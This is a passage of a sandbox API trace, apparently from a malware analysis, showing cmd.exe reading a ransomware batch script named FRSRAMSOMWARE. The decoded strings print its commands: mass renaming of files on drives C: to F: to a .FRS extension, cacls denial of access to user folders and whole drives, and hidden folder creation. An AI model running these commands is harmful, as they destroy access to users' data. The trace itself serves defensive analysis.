lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0083.758] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=540, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x21c [0083.758] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\*.*\" *.*.FRS\r\n.*\" *.*.FRS\r\n") returned 22 [0083.758] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x21c [0083.758] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0083.758] GetFileType (hFile=0x2a0) returned 0x1 [0083.758] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x21c [0083.758] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0083.758] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=562, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x232 [0083.758] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"D:\\*.*\" *.*.FRS\r\n") returned 22 [0083.758] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x232 [0083.758] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0083.758] GetFileType (hFile=0x2a0) returned 0x1 [0083.758] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x232 [0083.758] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0083.758] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=584, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0083.759] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"E:\\*.*\" *.*.FRS\r\n") returned 22 [0083.759] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0083.759] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0083.759] GetFileType (hFile=0x2a0) returned 0x1 [0083.759] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0083.759] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0083.759] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=606, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x25e [0083.759] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"F:\\*.*\" *.*.FRS\r\n") returned 22 [0083.759] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x25e [0083.759] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0083.759] GetFileType (hFile=0x2a0) returned 0x1 [0083.759] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x25e [0083.759] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0083.759] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=669, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x29d [0083.759] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=63, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Desktop\\*.*\" /e /d everyone\r\net n=%%i\r\n") returned 63 [0083.759] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x29d [0083.759] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0083.759] GetFileType (hFile=0x2a0) returned 0x1 [0083.759] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x29d [0083.759] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0083.759] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=736, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2e0 [0083.759] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=67, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Saved Games\\*.*\" /e /d everyone\r\n=%%i\r\n") returned 67 [0083.759] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2e0 [0083.759] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0083.759] GetFileType (hFile=0x2a0) returned 0x1 [0083.759] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2e0 [0083.759] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0083.759] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=797, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x31d [0083.760] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=61, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Links\\*.*\" /e /d everyone\r\nyone\r\n") returned 61 [0083.760] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x31d [0083.760] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0083.760] GetFileType (hFile=0x2a0) returned 0x1 [0083.760] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x31d [0083.760] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0083.760] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=862, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x35e [0083.760] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=65, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Favorites\\*.*\" /e /d everyone\r\n\r\n") returned 65 [0083.760] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x35e [0083.760] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0083.760] GetFileType (hFile=0x2a0) returned 0x1 [0083.760] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x35e [0083.760] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0083.760] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=926, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x39e [0083.760] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=64, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Searches\\*.*\" /e /d everyone\r\n\n") returned 64 [0083.760] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x39e [0083.760] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0083.760] GetFileType (hFile=0x2a0) returned 0x1 [0083.760] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x39e [0083.760] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0083.760] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=988, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0083.760] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=62, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Videos\\*.*\" /e /d everyone\r\n\r\n") returned 62 [0083.760] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0083.760] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0083.760] GetFileType (hFile=0x2a0) returned 0x1 [0083.760] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0083.760] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0083.760] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=1052, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x41c [0083.761] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=64, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Pictures\\*.*\" /e /d everyone\r\n") returned 64 [0083.761] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x41c [0083.761] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0083.761] GetFileType (hFile=0x2a0) returned 0x1 [0083.761] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x41c [0083.761] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0083.761] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=1103, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x44f [0083.761] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=51, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\Public\\*.*\" /e /d everyone\r\n/d everyone\r\n") returned 51 [0083.761] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x44f [0083.761] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0083.761] GetFileType (hFile=0x2a0) returned 0x1 [0083.761] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x44f [0083.761] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0083.761] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=1155, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0083.761] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=52, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Program Files\\*.*\" /e /d everyone\r\nd everyone\r\n") returned 52 [0083.761] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0083.761] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0083.761] GetFileType (hFile=0x2a0) returned 0x1 [0083.761] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0083.761] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0083.761] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=1193, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4a9 [0083.761] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\*.*\" /e /d everyone\r\n /d everyone\r\n") returned 38 [0083.761] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4a9 [0083.761] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0083.761] GetFileType (hFile=0x2a0) returned 0x1 [0083.761] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4a9 [0083.761] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0083.761] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=1231, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4cf [0083.761] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"D:\\*.*\" /e /d everyone\r\n") returned 38 [0083.762] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4cf [0083.762] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0083.762] GetFileType (hFile=0x2a0) returned 0x1 [0083.762] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4cf [0083.762] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0083.762] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=1269, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4f5 [0083.762] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"E:\\*.*\" /e /d everyone\r\n") returned 38 [0083.762] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4f5 [0083.762] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0083.762] GetFileType (hFile=0x2a0) returned 0x1 [0083.762] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4f5 [0083.762] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0083.762] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=1307, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x51b [0083.762] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"F:\\*.*\" /e /d everyone\r\n") returned 38 [0083.762] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x51b [0083.762] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0083.762] GetFileType (hFile=0x2a0) returned 0x1 [0083.762] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x51b [0083.762] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0083.762] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=1315, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x523 [0083.762] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 3\r\nacls \"F:\\*.*\" /e /d everyone\r\n") returned 8 [0083.762] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x523 [0083.762] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0083.762] GetFileType (hFile=0x2a0) returned 0x1 [0083.762] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x523 [0083.762] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0083.762] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=1317, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x525 [0083.762] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\nto 3\r\n") returned 2 [0083.763] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x525 [0083.763] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0083.763] GetFileType (hFile=0x2a0) returned 0x1 [0083.763] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x525 [0083.763] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0083.763] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=1321, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x529 [0083.763] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":3\r\n 3\r\n") returned 4 [0083.763] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x529 [0083.763] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0083.763] GetFileType (hFile=0x2a0) returned 0x1 [0083.763] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x529 [0083.763] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0083.763] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=1342, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x53e [0083.763] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=21, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="md C:\\FRSRAMSOMWARE\r\n /e /d everyone\r\n") returned 21 [0083.763] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53e [0083.763] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0083.763] GetFileType (hFile=0x2a0) returned 0x1 [0083.763] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53e [0083.763] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0083.763] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=1379, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0083.763] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=37, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="attrib +s +a +h +r C:\\FRSRAMSOMWARE\r\n\n") returned 37 [0083.763] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0083.763] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0083.763] GetFileType (hFile=0x2a0) returned 0x1 [0083.763] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0083.763] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0083.764] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=1395, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0083.764] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=16, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="md C:\\FRS_TEMP\r\n+r C:\\FRSRAMSOMWARE\r\n") returned 16 [0083.764] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0083.764] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0083.764] GetFileType (hFile=0x2a0) returned 0x1 [0083.764] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0083.764] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0083.764] 